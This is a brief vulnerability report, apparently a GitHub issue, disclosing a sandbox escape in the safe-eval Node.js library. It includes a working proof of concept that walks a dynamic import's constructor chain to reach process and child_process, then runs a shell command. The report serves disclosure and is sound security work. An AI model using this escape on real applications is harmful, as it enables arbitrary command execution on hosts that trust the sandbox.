Sandbox Escape #27
Description
We found sandbox escape vulnerability in the latest version of safe-eval (node v18.12.1)
POC :
const safe_eval = require('safe-eval')
code = `
import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch rce')
`
safe_eval(code)
Our payload is inspired by CVE-2021-23449 in vm2